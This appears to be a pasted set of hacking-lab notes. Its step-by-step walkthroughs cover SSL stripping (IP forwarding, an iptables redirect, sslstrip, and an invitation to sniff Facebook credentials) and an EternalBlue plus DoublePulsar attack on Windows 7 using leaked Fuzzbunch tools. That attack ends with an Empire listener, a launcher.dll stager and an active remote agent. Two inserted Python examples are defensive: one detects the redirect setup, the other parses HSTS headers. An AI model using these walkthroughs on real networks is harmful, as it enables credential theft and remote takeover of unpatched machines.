LuciferAviSonicX

eternal

Oct 27th, 2017
SSL Stripping
-------------
SSL -->> Secure Sockets Layer --> protects data by encrypting it.
Used in HTTPS
s --> Secure --> SSL

We use 3 commands to perform SSL stripping.
1. Enable IP forwarding
$ more /proc/sys/net/ipv4/ip_forward
0
$ echo 1 > /proc/sys/net/ipv4/ip_forward
$ more /proc/sys/net/ipv4/ip_forward
1

2. To forward and redirect the traffic via a different port, 8080
$ nano /etc/ettercap/etter.conf
LINUX
IPtables
iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport

$ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

3. To start SSL stripping
$ sslstrip -l 8080

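Steps 1 and 2 leave two artifacts on the intercepting machine: IP forwarding switched on, and a NAT PREROUTING rule that redirects port 80 to a local port. The example below is added here and is not part of the original paste; it checks for both from the defender's side. The sample iptables-save output and the function names are constructed for illustration.

```python
import shlex

# Constructed sample of `iptables-save -t nat` output (not captured from a real host).
SAMPLE_NAT = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8080
-A PREROUTING -i eth0 -p tcp -m tcp --dport 2222 -j REDIRECT --to-ports 22
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
"""

WEB_PORTS = {"80", "443"}


def find_web_redirects(nat_rules):
    """Return (dport, local_port) for PREROUTING REDIRECT rules that catch web traffic."""
    hits = []
    for line in nat_rules.splitlines():
        tok = shlex.split(line)
        if tok[:2] != ["-A", "PREROUTING"] or "REDIRECT" not in tok:
            continue
        # Map each long option to the token that follows it.
        opts = {t: tok[i + 1] for i, t in enumerate(tok[:-1]) if t.startswith("--")}
        # --dport is a single port; -m multiport uses --dports with a comma list.
        dports = (opts.get("--dport") or opts.get("--dports", "")).split(",")
        for port in WEB_PORTS.intersection(dports):
            hits.append((port, opts.get("--to-ports")))
    return hits


def audit(ip_forward_text, nat_rules):
    """Flag the combination the paste sets up: forwarding on AND web ports redirected."""
    forwarding = ip_forward_text.strip() == "1"
    redirects = find_web_redirects(nat_rules)
    return {"forwarding": forwarding, "redirects": redirects,
            "suspicious": forwarding and bool(redirects)}


if __name__ == "__main__":
    print(audit("1\n", SAMPLE_NAT))
```

On a live host, pass in the contents of /proc/sys/net/ipv4/ip_forward and the output of iptables-save -t nat. Gateways and transparent proxies match legitimately, so the finding is a hit on a workstation or server that has no reason to route.
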
https://www.facebook.com
https
HSTS
****Try sniffing facebook's credentials using sslstrip2

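HSTS is the control that decides whether a browser will accept the downgrade at all. The example below is added here and is not part of the original paste; it parses a Strict-Transport-Security header per RFC 6797 and classifies how much protection it gives. The function names, category labels and sample header values are constructed for illustration.

```python
PRELOAD_MIN_AGE = 31536000  # one year, the minimum hstspreload.org accepts


def parse_hsts(value):
    """Parse a Strict-Transport-Security value (RFC 6797 section 6.1).

    Returns a dict of directives, or None if a browser must ignore the header.
    """
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        name = name.strip().lower()          # directive names are case-insensitive
        if name in directives:               # a repeated directive invalidates the header
            return None
        directives[name] = arg.strip().strip('"')
    age = directives.get("max-age", "")
    if not (age.isascii() and age.isdigit()):
        return None                          # max-age is required and must be an integer
    directives["max-age"] = int(age)
    return directives


def strip_exposure(scheme, header):
    """Classify a host's exposure to an HTTPS-to-HTTP downgrade on the wire."""
    if scheme != "https" or header is None:
        return "unprotected"                 # browsers ignore HSTS sent over plain HTTP
    policy = parse_hsts(header)
    if policy is None or policy["max-age"] == 0:
        return "unprotected"                 # max-age=0 tells the browser to drop the policy
    if (policy["max-age"] >= PRELOAD_MIN_AGE
            and "includesubdomains" in policy and "preload" in policy):
        # Meets the preload-list criteria; once listed, there is no first-visit gap.
        return "preload-eligible"
    return "first-visit-gap"                 # protected only after one clean HTTPS visit


if __name__ == "__main__":
    print(strip_exposure("https", "max-age=63072000; includeSubDomains; preload"))
```
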
Xerosploit
----------
https://github.com/LionSec/xerosploit.git

EternalBlue
-----------
EternalBlue Documentation
-------------------------
Download Python 2.6 from the link ----> https://www.python.org/download/releases/2.6/
After installing Python you need to add its path to the environment variables
"Right click" on "My Computer"
"Click" on "Properties"
Go to "Advanced" tab
"Click" on "Environment Variables"
Under "System Variables" table ----> Under "Variable" column
Select "Path" and click on "Edit"
Type the following
;C:\python26\;C:\python26\scripts\;
click "OK"
click "OK"
click "OK"
Restart your computer

Download PyWin32 v2.12 from the link below. It will offer many versions; download only pywin32-212.win32-py2.6
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
After installing it, restart your computer

Download a text editor which shows line numbers too.
Notepad++ --> https://notepad-plus-plus.org/download/

Download shadowbroker Project from the link ---> https://github.com/misterch0c/shadowbroker

Extract the shadowbroker project.
Copy it to the C:\ drive.
Go to C:\shadowbroker\windows
1. There will be a file fb.py
Open the file in a text editor.
Go to line 72 and comment it out by putting # at the start of the 72nd line
Save the file and exit.

2. There will be a file, Fuzzbunch.xml
Open that file too in a text editor
Go to line 19 ---> change the path to C:\shadowbroker\windows\Resources
Go to line 24 ---> change the path to C:\shadowbroker\windows\logs

Open command prompt and type
cd C:\
cd shadowbroker\windows
python fb.py

It will launch the shadowbroker python script
Default Target IP Address ---> IP Address of Windows 7 ------> hit enter
Default Callback IP Address ---> IP Address of Windows XP -----> hit enter
Use Redirections ----> type "no" ------> hit enter
---> hit enter
Project[0]:0 ---> select from the list -----> 0 to create a new project ----> hit enter
Give the project name ----> hit enter
Type "yes" and hit enter

On the screen it will show
fb>

Now type the following
fb> use eternalblue -----> hit enter
type "yes" ---> hit enter
hit enter
hit enter
hit enter
hit enter
hit enter
hit enter
hit enter
type "1" ---> hit enter
type "1" ---> hit enter
hit enter
hit enter
hit enter
hit enter

It will start our eternalblue plugin and will ping the backdoor in Windows 7. After many, many lines, it will show Eternalblue Succeeded.

Open Kali Linux machine
-----------------------
Download Empire project from the link -----> https://github.com/EmpireProject/Empire
Extract and copy Empire project on the desktop.

Open the terminal, type the following
cd Desktop
cd Empire
cd setup
chmod +x install.sh
./install.sh
This will install all the basic libraries for Empire.
python setup-database.py
cd ..
chmod +x empire
./empire
It will start the Empire project, which will help us in setting up the listener and creating the DLL file for getting access to Windows 7

It will show the following on the terminal
(Empire) >
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name Eternal
(Empire: listeners/http) > set Host http://<kali linux IP Address>
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > set execute

It will start listening on http://<kali IP Address>:8080

(Empire: listeners/http) > back
(Empire: listeners) > list

(Empire: listeners) > usestagers windows/dll Eternal
(Empire: windows/dll) > set Arch x64
(Empire: windows/dll) > execute
It will create a DLL file named launcher.dll in /tmp/launcher.dll
Our Kali Linux machine will start listening for any reverse connection, which will be executed by the launcher.dll file on port 8080

Copy and paste the launcher.dll file to Windows XP

Go back to Windows XP again, to the same terminal which we left open
fb Special (EternalBlue) > use Doublepulsar ---> hit enter
type "yes" ----> hit enter
hit enter
hit enter
type "0" ----> hit enter
type "1" ----> hit enter
type "2" ----> hit enter
complete path of launcher.dll file ----> hit enter
hit enter
hit enter
hit enter
hit enter
hit enter
type "yes" ----> hit enter
It will start executing launcher.dll on the Windows 7 machine.
After many, many lines it will show Doublepulsar Succeeded

Go to the Kali Linux machine; in the Empire shell terminal, it will show
(Empire: windows/dll) > Initial agent ****** from <windows 7 IP> now active
(Empire: windows/dll) > agents
(Empire: agents) > interact <agent name>
(Empire: <agent name>) > sysinfo